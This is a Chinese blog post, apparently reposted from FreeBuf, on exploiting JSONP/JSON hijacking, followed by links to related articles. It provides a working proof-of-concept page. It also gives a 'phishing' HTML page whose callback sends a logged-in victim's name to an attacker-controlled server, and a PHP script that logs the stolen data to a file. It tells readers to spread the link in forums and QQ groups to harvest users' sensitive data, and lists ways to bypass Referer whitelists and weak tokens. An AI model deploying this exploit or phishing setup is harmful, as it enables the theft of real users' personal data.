小学生都会挖掘的JSON Hijacking实战利用

最新推荐文章于 2024-02-07 15:40:39 发布
最新推荐文章于 2024-02-07 15:40:39 发布
阅读量503 收藏 3
点赞数
分类专栏: 安全实战

前言

JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。

0×01漏洞的挖掘

一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:

我们在返回包中json格式发现了如下的敏感信息(用户Id,用户名,用户手机号码)。 

 

0×02漏洞的证明之poc

提交漏洞,poc在众测时要争分夺秒,所以这边用了最精简的一个POC。

假如返回的数据为:

txf({“data”:{“name”:”唐晓峰”}});

<html>
<head>
<script>
function txf(a){
alert(a.data.name);
}
</script>

<script src=http://***.***.**/wm/User/getUserInfo?callback=txf></script>
</body>
</html>

 即可如下弹窗:

 

 

 

0×03漏洞的利用之钓鱼

1.准备一台web服务器,我直接phpstudy搭的。

附上服务器端的代码

 json.php

<?php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "名字:  ".$name."\r\n");
?><html>

 钓鱼.html

<head>
    <title>txf</title>
<script>
	var xmlhttp;
    function txf(a)
    {
    xmlhttp=new XMLHttpRequest()
	var x="http://***.***.***/json.php?name="+a.data.name;
	xmlhttp.open("GET", x, true);
	xmlhttp.send();
	}
</script>>
<script src=http://***.***.***?callback=txf></script>
</head>
<body>
	<textarea>钓鱼啦,傻瓜</textarea>>
</body>
</html>

 把钓鱼链接http://***.***.***/钓鱼.html发给该网站已登陆的用户,如论坛,社区QQ群,社区贴吧等,服务端即可获取到大量用户敏感数据。

0×04漏洞的修复与绕过

因为这个例子是小伙伴发过来的还没修复,所以都脱敏了,我们再从开发修复的角度去思考如何绕过修复。

1.Referer白名单

子域名绕过,文件名绕过,空Referer绕过

2.增加token认证

token足够复杂或者服务端加密,我们无法绕过,如果token很简单,如纯数字,我们可以尝试遍历绕过

3.接口禁用

无敌的操作,无法绕过

总结:

非常有意思的一个劫持,以前没有利用过,只是知道有这么个东西,一般众测或者项目上遇到我都是直接截图,申明一波敏感信息泄露,然后就结束了,很低危,这次实战利用之后,稍微提高了一点逼格。

*本文作者:zhukaiang7,转载请注明来自FreeBuf.COM

 

 

大方子
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JSONP存在的JSON Hijacking漏洞以及与csrf/xss漏洞的关系
Meditation
01-28 8941
在实习过程中接触过所谓的JSON Hijacking 漏洞,但最近在写论文时发现理解得不深,好像跟xss与csrf又有点区别与联系,索 性深入学习了下JSONP。 下面一段话截取自:http://stackoverflow.com/questions/2067472/what-is-jsonp-all-about 举例
JSON Hijacking利用
tenfyguo的技术专栏
11-21 3610
<br />from:http://www.7747.net/Article/200812/30705.html<br /> <br /> <br />JSON Hijacking有什么作用,正如黑哥所说,可以CSRF得到用户隐私数据:)。<br />原理最后介绍,先来看个攻击例子,拿饭否来做个实验。首先我们看这:<a href="http://help.fanfou.com/api.html" target="_blank">http://help.fanfou.com/api.html</a>。饭否的A
[Web Security] JSON Hijacking
weixin_34357887的博客
08-23 158
After reading the blog, the main take away from there is: "Never send back JOSN array to the client side, it is easy to be hijacked, using JSON object, it is because JSON object is not considered t...
JSON Hijacking漏洞
weixin_30872337的博客
08-19 238
https://github.com/SkyLined/LocalNetworkScanner JS.利用浏览器漏洞当对方打开网址时,扫描对方内网信息 https://www.freebuf.com/articles/web/194698.html 小学生挖掘JSON Hijacking实战利用jsonp跨域漏洞 https://www.anquanke.com/post/id...
DLL-hijacking
05-15
DLL劫持(DLL-Hijacking)是一种常见的恶意技术,它利用了Windows操作系统中动态链接库(Dynamic Link Library)加载机制的漏洞。攻击者通过精心设计,使得系统在尝试加载特定DLL时,错误地加载了攻击者提供的伪造...
JSON 教程导读.pdf
最新发布
02-22
- **JSON Hijacking**:通过修改 JSON 请求中的关键字段来改变请求行为的安全问题。 - **最佳实践**: - 对所有外部输入的数据进行验证。 - 使用安全的编码和转义机制。 - 遵循最小权限原则,只暴露必要的数据。 ...
详解JSONJSONP劫持以及解决方法
10-17
首先,了解JSON劫持,也就是JSON Hijacking。这种攻击方式类似于CSRF(跨站请求伪造),但其目的在于获取敏感数据。在JSON劫持中,攻击者利用浏览器中script标签的特性来执行恶意脚本,并从已经登录的用户浏览器中...
dll-hijacking:dll代理
05-07
PS C:\Users\rek7\Documents\dll-hijacking > python3 .\parse.py --help usage: parse.py [ -h ] -d DLL [ -f HEADER_FILE ] [ -b DUMP_BIN ] Proxy DLL Creator optional arguments: -h, --help show this help ...
ajax返回json对象.zip
04-15
- **JSON Hijacking**:需要注意防止JSON响应被恶意脚本利用。 - **JSONP的安全性**:由于JSONP基于脚本注入,存在一定的安全隐患。 - **CORS策略**:正确配置CORS策略以确保跨域请求的安全。 8. **错误处理**:...
学校的信息,json数据
06-21
就是涵盖了大部分学校的信息(名称,位置)的json数据
JSON劫持攻击
QQ_346127357的博客
05-09 626
JSON 劫持又为“ JSON Hijacking ”,最开始提出这个概念大概是在 2008 年国外有安全研究人员提到这个 JSONP 带来的风险。其实这个问题属于 CSRF( Cross-site request forgery 跨站请求伪造)攻击范畴。当某网站听过 JSONP 的方式来快域(一般为子域)传递用户认证后的敏感信息时,攻击者可以构造恶意的 JSONP 调用页面,诱导被攻击者访问来达到截取用户敏感信息的目的。 漏洞原理 JSON实际应用的时候有两种传输数据的方式: xmlhttp获取数
JSON hijacking
jvisualvm
04-01 259
原创转载请注明出处:http://agilestyle.iteye.com/blog/2367009   Issue JSON劫持利用一些浏览器的功能,允许脚本覆盖核心语言的对象setter的例程,它允许恶意JavaScript插入逻辑,使其监控服务器返回的JSON消息。   在一个JSON劫持攻击中,攻击者将覆盖的JavaScript数组传递给它的构造函数来窃取信息。攻击者然后嵌入...
jsonp劫持
think_ycx的专栏
01-31 3421
基础: 说说JSONJSONP,也许你豁然开朗,含jQuery用例     JSONP 安全攻防技术 【技术分享】JSONP注入实战指南  案例: payload: $.ajax({type:"get",url:"http://o2odemo.fanwe.net/mapi/index.php?ctl=synclogin&act=index&login_type=Sina
Json hijacking/Json 劫持注入漏洞原理以及修复方法
it知识分享 free for nothing..
02-07 1147
Json hijacking/Json 劫持注入漏洞原理以及修复方法
JSONP Hijackin攻击详解
m0_37595954的博客
01-06 346
JSONP Hijackin的中文意思是JSON劫持,而能产生JSON数据劫持的原因在于前端被跨站攻击了。跨站=跨域,跨域从字面上理解的话,就是指超出了范围、领域。继续追问一下,那超出了什么范围?原来指的范围有多大?理解跨站攻击的基础在于理解这个域有多大。为了更准确的理解JSON Hijackin攻击,建议读者可以先了解一下如下几个背景知识: 域概念 (下文介绍) JSON (搜索引擎查一...
浅谈“Json hijacking/Json劫持注入”
→_→
05-17 1075
漏洞名称: Json hijackingJson劫持漏洞、Json注入攻击 描述: JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成,这种纯文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,各种大型网站都开始使用,包括Yahoo,Google,Tencent,Baidu等等,目前各银行都有用这种方式来实现数据交互。但是如果这种交互的方式用来传递敏感的数
JSON Hijacking小结
9ian1i
04-06 2740
0x00 head 最近在慢慢的读《Web 之困》这本书,作者想要传达的知识量真的很大,好几次译者都在下面注释出作者几句话背后所隐含的知识点,这次看到一篇8年前关于JSON Hijacking的文章,很久远却一点也不过时。 0x01 JSON 首先我们讲讲JSONJSON 全名JavaScript Object Notation (JavaScript对象表示法),是一种轻量级的数据交换格
Beginning JSON:入门指南
7. **安全问题**:讲解使用JSON时可能遇到的安全风险,如跨站脚本攻击(XSS)和JSON Hijacking,并提供相应的防范措施。 8. **实践应用**:通过实例分析和练习,帮助读者在实际项目中运用JSON,如构建RESTful API,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值